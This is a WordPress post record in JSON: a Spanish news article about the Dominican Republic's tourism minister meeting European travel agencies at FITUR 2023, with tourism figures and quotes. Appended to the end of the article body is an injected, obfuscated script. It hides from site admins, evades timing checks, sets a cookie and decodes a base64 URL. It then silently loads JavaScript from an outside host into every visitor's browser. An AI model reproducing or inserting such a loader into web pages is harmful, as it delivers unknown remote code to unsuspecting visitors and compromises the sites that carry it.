{"id":13414,"date":"2023-01-17T11:07:17","date_gmt":"2023-01-17T15:07:17","guid":{"rendered":"https:\/\/yanessiespinal.com\/?p=13414"},"modified":"2023-01-17T11:07:17","modified_gmt":"2023-01-17T15:07:17","slug":"fitur-2023-ministerio-de-turismo-realiza-encuentro-con-mas-de-200-agencias-de-viajes-y-tour-operadores-europeos","status":"publish","type":"post","link":"https:\/\/enterarterd.com\/?p=13414","title":{"rendered":"FITUR 2023: Ministerio de Turismo realiza encuentro con m\u00e1s de 200 agencias de viajes y tour operadores europeos"},"content":{"rendered":"<p>Madrid. &#8211;\u00a0<strong>El Ministro de Turismo, David Collado,\u00a0<\/strong>realiz\u00f3 un encuentro con\u00a0<strong>m\u00e1s de<\/strong>\u00a0<strong>200 agencias de viajes y tour operadores, l\u00edneas a\u00e9reas y medios de Europa<\/strong>, en un evento realizado en el Hotel Marriott Auditorium de Madrid que sirvi\u00f3 adem\u00e1s como apertura de la agenda de actividades, en ocasi\u00f3n de celebrarse en esta ciudad la\u00a0<strong>Feria Internacional de Turismo, FITUR 2023.<\/strong><\/p>\n<p>Collado resalt\u00f3 que Rep\u00fablica Dominicana cerr\u00f3 el 2022 como\u00a0<strong>uno de los pa\u00edses l\u00edderes en el mundo en materia de recuperaci\u00f3n de turismo,\u00a0<\/strong>en<strong>\u00a0<\/strong>comparaci\u00f3n con 2019 (a\u00f1o prepandemia), y expuso ante la audiencia europea los resultados r\u00e9cords que tuvo el pa\u00eds al cierre de diciembre del 2022,\u00a0<strong>primer a\u00f1o en la historia que la naci\u00f3n supera los 7 millones de turistas y los 8 millones de visitantes totales, incluyendo cruceros.<\/strong><\/p>\n<p><em>\u201cEuropa es uno de los mercados m\u00e1s importantes para nuestro pa\u00eds, ya que el a\u00f1o pasado recibimos m\u00e1s de 1. 4 millones de turistas de la zona. Con actividades como esta, lo que buscamos es estrechar la cooperaci\u00f3n y alianzas con cada una de las agencias de viajes y tour operadores de la regi\u00f3n, para que continuemos creciendo de la mano y que en este 2023 tambi\u00e9n alcancemos cifras nunca antes vistas\u201d,<\/em>\u00a0expuso Collado durante el evento.<\/p>\n<p>En la presentaci\u00f3n tambi\u00e9n particip\u00f3 la\u00a0<strong>viceministra de turismo Jaqueline Mora,<\/strong>\u00a0quien abord\u00f3 los\u00a0<strong>retos y oportunidades de cara al 2023\u00a0<\/strong>destacando las tendencias y los proyectos que se est\u00e1n desarrollando en Rep\u00fablica Dominicana para abordar dichos retos.<\/p>\n<p><em>\u201cLa Rep\u00fablica Dominicana creci\u00f3 en un 11 % respecto al 2019 en materia de llegada de turistas por v\u00eda a\u00e9rea y crecimos en un 19 % en llegada de visitantes por v\u00eda de cruceros respecto a ese a\u00f1o, por lo que llegamos a un total sin precedentes de 8.5 millones de visitantes en 2022.\u00a0 El mundo enfrenta retos de crecimiento y altas tasas de inter\u00e9s, pero el turismo ha mostrado ser resiliente y el turista buscar\u00e1 destinos donde obtenga un mayor valor por su dinero, como es Rep\u00fablica Dominicana\u201d,\u00a0<\/em>se\u00f1al\u00f3 Mora.<\/p>\n<p>De su lado, Collado explic\u00f3 la\u00a0<strong>importancia de estos r\u00e9cords m\u00e1s all\u00e1 de los n\u00fameros<\/strong>. El Ministro indic\u00f3 que cada vez que el pa\u00eds mejora su desempe\u00f1o en materia de turismo se traduce en\u00a0<strong>m\u00e1s empleos y oportunidades para las familias de Rep\u00fablica Dominicana.<\/strong><\/p>\n<p><em>\u201cGracias porque con cada vuelo o con cada habitaci\u00f3n que ustedes venden de Rep\u00fablica Dominicana est\u00e1n ayudando a una familia; por eso para nosotros es tan importante trabajar de la mano con todos ustedes; las agencias grandes, medianas y peque\u00f1as, que son los socios estrat\u00e9gicos, nos permiten colocar nuestro pa\u00eds dentro de los destinos predilectos de los europeos y el mundo\u201d<\/em>\u00a0apunt\u00f3 el Ministro.<\/p>\n<p>Esta actividad cont\u00f3 con\u00a0<strong>el apoyo de los inversionistas locales e internacionales y la banca<\/strong>.\u00a0 Todo el evento estuvo lleno de la marca Rep\u00fablica Dominicana, y se mostraron de manera magistral\u00a0<strong>las bellezas del pa\u00eds<\/strong>, confirmando una vez m\u00e1s que definitivamente el pa\u00eds lo tiene todo.<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Madrid. &#8211;\u00a0El Ministro de Turismo, David Collado,\u00a0realiz\u00f3 un encuentro con\u00a0m\u00e1s de\u00a0200 agencias de viajes y tour operadores, l\u00edneas a\u00e9reas y medios de Europa, en un evento realizado en el Hotel Marriott Auditorium de Madrid que sirvi\u00f3 adem\u00e1s como apertura de la agenda de actividades, en ocasi\u00f3n de celebrarse en esta ciudad la\u00a0Feria Internacional de Turismo, [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":13416,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":{"0":"post-13414","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-nacionales"},"_links":{"self":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/13414","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=13414"}],"version-history":[{"count":0,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/13414\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/media\/13416"}],"wp:attachment":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=13414"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=13414"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=13414"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}